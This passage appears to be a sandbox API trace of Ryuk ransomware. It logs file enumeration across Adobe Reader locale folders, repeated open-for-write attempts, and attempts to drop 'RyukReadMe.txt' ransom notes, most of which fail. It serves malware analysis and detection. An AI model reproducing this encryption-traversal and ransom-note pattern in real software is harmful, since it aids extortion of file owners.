SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\SaveAsRTF.CZE", dwFileAttributes=0x80) returned 0 [0138.486] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\SaveAsRTF.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\saveasrtf.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.486] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.486] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.486] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.486] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Search.CZE", dwFileAttributes=0x80) returned 0 [0138.487] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Search.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\search.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.487] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.487] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.487] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.487] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\SendMail.CZE", dwFileAttributes=0x80) returned 0 [0138.487] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\SendMail.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\sendmail.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.487] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.488] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.488] SetLastError (dwErrCode=0x0) [0138.488] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.488] GetLastError () returned 0x5 [0138.488] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.488] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.488] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.489] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.489] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.489] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.489] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\DEXShare.asfx", dwFileAttributes=0x80) returned 0 [0138.489] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.489] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.490] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.490] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.490] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\Services.asfx", dwFileAttributes=0x80) returned 0 [0138.490] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.490] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.490] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.490] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.490] SetLastError (dwErrCode=0x0) [0138.490] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.490] GetLastError () returned 0x5 [0138.490] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.490] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.491] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.491] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Spelling.CZE", dwFileAttributes=0x80) returned 0 [0138.492] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Spelling.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\spelling.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.492] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.492] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.492] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.492] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\updater.CZE", dwFileAttributes=0x80) returned 0 [0138.492] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\updater.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\updater.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.493] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.493] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.493] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.493] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\WebLink.CZE", dwFileAttributes=0x80) returned 0 [0138.493] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\WebLink.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\weblink.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.493] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.493] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.493] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.493] SetLastError (dwErrCode=0x0) [0138.493] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.494] GetLastError () returned 0x5 [0138.494] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.494] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.494] SetLastError (dwErrCode=0x0) [0138.494] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.494] GetLastError () returned 0x5 [0138.494] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.494] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.494] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.496] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.496] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.496] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.496] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\accessibility.DAN", dwFileAttributes=0x80) returned 0 [0138.497] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\accessibility.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\accessibility.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.497] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.497] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.497] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.498] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Acroform.DAN", dwFileAttributes=0x80) returned 0 [0138.498] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Acroform.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\acroform.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.498] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.498] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.498] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.499] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\AdobeCollabSync.DAN", dwFileAttributes=0x80) returned 0 [0138.500] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\AdobeCollabSync.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\adobecollabsync.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.500] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.500] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.500] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.500] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Annots.DAN", dwFileAttributes=0x80) returned 0 [0138.501] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Annots.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\annots.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.501] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.501] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.501] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.501] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\BRdlang32.DAN", dwFileAttributes=0x80) returned 0 [0138.501] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\BRdlang32.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\brdlang32.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.502] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.502] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.502] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.502] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Checkers.DAN", dwFileAttributes=0x80) returned 0 [0138.502] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Checkers.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\checkers.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.503] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.503] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.503] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.503] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\DigSig.DAN", dwFileAttributes=0x80) returned 0 [0138.504] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\DigSig.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\digsig.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.504] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.504] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.504] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.504] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\DVA.DAN", dwFileAttributes=0x80) returned 0 [0138.505] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\DVA.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\dva.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.505] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.505] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.505] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.505] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\eBook.DAN", dwFileAttributes=0x80) returned 0 [0138.506] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\eBook.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\ebook.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.506] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.506] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.506] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.506] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\EScript.DAN", dwFileAttributes=0x80) returned 0 [0138.506] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\EScript.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\escript.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.506] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.506] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.506] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.507] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\IA32.DAN", dwFileAttributes=0x80) returned 0 [0138.507] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\IA32.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\ia32.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.507] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.507] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.507] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.507] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\makeaccessible.DAN", dwFileAttributes=0x80) returned 0 [0138.509] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\makeaccessible.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\makeaccessible.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.509] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.509] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.509] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.509] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Multimedia.DAN", dwFileAttributes=0x80) returned 0 [0138.509] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Multimedia.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\multimedia.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.509] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.509] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.510] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.510] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\pddom.DAN", dwFileAttributes=0x80) returned 0 [0138.510] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\pddom.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\pddom.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.510] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.511] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.511] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.511] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\PPKLITE.DAN", dwFileAttributes=0x80) returned 0 [0138.511] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\PPKLITE.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\ppklite.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.511] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.511] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.511] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.511] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.512] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\RdLang32.DAN", dwFileAttributes=0x80) returned 0 [0138.512] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\RdLang32.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\rdlang32.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.512] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.512] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.512] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.513] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.513] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\ReadOutLoud.DAN", dwFileAttributes=0x80) returned 0 [0138.513] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\ReadOutLoud.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\readoutloud.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.513] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.513] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.514] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.514] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.514] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\reflow.DAN", dwFileAttributes=0x80) returned 0 [0138.514] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\reflow.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\reflow.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.515] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.515] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.515] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.515] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.515] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\SaveAsRTF.DAN", dwFileAttributes=0x80) returned 0 [0138.516] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 